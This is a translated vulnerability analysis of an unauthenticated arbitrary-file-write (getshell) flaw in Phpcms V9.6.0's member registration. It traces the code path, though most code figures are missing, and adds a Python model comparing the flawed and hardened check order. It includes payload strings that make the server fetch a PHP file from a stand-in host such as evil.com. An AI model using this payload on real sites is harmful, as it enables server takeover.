Phpcms V9.6.0 arbitrary file write getshell vulnerability analysis - vulnerability warning - the black bar safety net

2017-04-13T00:00:00
ID MYHACK58:62201785219
Type myhack58
Reporter Anonymous
Modified 2017-04-13T00:00:00

Description

1 Introduction:

This is said to be a 0day that circulated privately for about half a year and was only recently made public. It sits in the member registration page, so the vulnerability can be exploited without logging in, which makes it all the more serious.

2 Vulnerability analysis:

Before following the registration page, look at the member registration settings of a default phpcms v9 installation, stored in the member_setting.cache.php file; its content is as follows:


Now to the main point, the registration page code in phpcms\modules\member\index.php.

The entry point is the register function:


This part of the logic is controlled by the switches in the member registration settings file shown above. Skipping quickly past it, go straight to line 130:


In the last line, $user_model_info is the user-submitted info variable (an array) after processing. Tracing how $user_model_info is produced leads to the get method in caches\caches_model\caches_data\member_input.class.php:


$this->fields is defined in the constructor; the code reads the content of a cache file:


The variable $modelid is defined in phpcms\modules\member\index.php and can be supplied directly via POST:


With $modelid under the user's control, setting it to 1 makes the code read the cache configuration from model_field_1.cache.php. Following model_field_1.cache.php, line 262 defines:


Back in the get method, $value = $this->$func($field, $value) is effectively $value = editor($field, $value), where both $field and $value are controllable: they are the key and the value of the POST info array.

Then follow the editor method:


Continue to follow the key part: the call to the download method of the attachment class on the penultimate line. Note that its first argument $field, the key of the POST info array, is hard-coded as content, so the submitted payload must take the form info[content]=xxxx. The download method lives in phpcms\libs\classes\attachment.class.php:


The regular expression on the penultimate line of the figure roughly means: if the url does not end with one of the image suffixes gif|jpg|jpeg|bmp|png, the original url is returned unchanged and the function exits without ever reaching the vulnerability trigger point. (The regex takes the value matched by its third parenthesised group; for example, submitting info[content]= href=http://evil.com/1.jpg gives the match http://evil.com/1.jpg.)

The vendor's code then goes to the fillurl method to complete the url:


This is exactly where the problem arises. Follow the fillurl method:


Note line 300: anyone who reads PHP can see from the check for # above that when the user-submitted url contains a #, only the part before the # is kept as the url.

The subsequent code is omitted; its job is to strip an empty http:// prefix from the url above, replace repeated / with a single /, and finally return a url prefixed with http://. So if the user submits info[content]= href=http://evil.com/1.php#x.jpg, the result returned after fillurl processing is http://evil.com/1.php. Is that not a problem? :)

Back to the download method, whose analysis was left unfinished above. The next step takes the file suffix, fileext:


We find that the suffix is whatever follows the last dot. Combined with the analysis above, the variable $file entering this logic is by now http://evil.com/1.php, so the file suffix obtained becomes php.
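To make the order-of-operations problem concrete, here is an added Python model (not phpcms's own code) of the three steps the page describes: the image-suffix regex on the raw url, the # truncation in fillurl, and the last-dot suffix in fileext, alongside the same check performed after normalisation. The regex and helper bodies are simplified assumptions chosen to match the behaviour described, not the project's actual source.

```python
import re
from urllib.parse import urlsplit

# Whitelist of image suffixes the page says the regex accepts.
ALLOWED = {"gif", "jpg", "jpeg", "bmp", "png"}


def passes_image_regex(url: str) -> bool:
    """Assumed model of the pre-check: only a url whose text ends in an
    image suffix proceeds to the download logic."""
    return re.search(r"\.(gif|jpg|jpeg|bmp|png)$", url, re.I) is not None


def fillurl_model(url: str) -> str:
    """Assumed model of fillurl as described: keep only the part before
    '#', collapse repeated '/' and return the url with an http:// prefix."""
    url = url.split("#", 1)[0]
    if url.lower().startswith("http://"):
        url = url[len("http://"):]
    url = re.sub(r"/+", "/", url)
    return "http://" + url


def fileext_model(path: str) -> str:
    """Assumed model of fileext: the text after the last dot."""
    return path.rsplit(".", 1)[-1].lower() if "." in path else ""


def vulnerable_effective_ext(submitted: str):
    """Vulnerable order: regex on the raw url, then normalise, then derive
    the suffix that will name the file on disk. Returns None if rejected."""
    if not passes_image_regex(submitted):
        return None
    return fileext_model(fillurl_model(submitted))


def hardened_effective_ext(submitted: str):
    """Fixed order: normalise first, derive the extension from the url path
    only, and check that against the whitelist. Returns None if rejected."""
    normalised = fillurl_model(submitted)
    ext = fileext_model(urlsplit(normalised).path)
    return ext if ext in ALLOWED else None
```

The vulnerable flow accepts http://evil.com/1.php#x.jpg because the regex sees the trailing .jpg while fillurl later discards it; the hardened flow rejects it because the whitelist check runs on the url that will actually be fetched and named.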

Continue looking at the download method; the code flow reaches line 171:

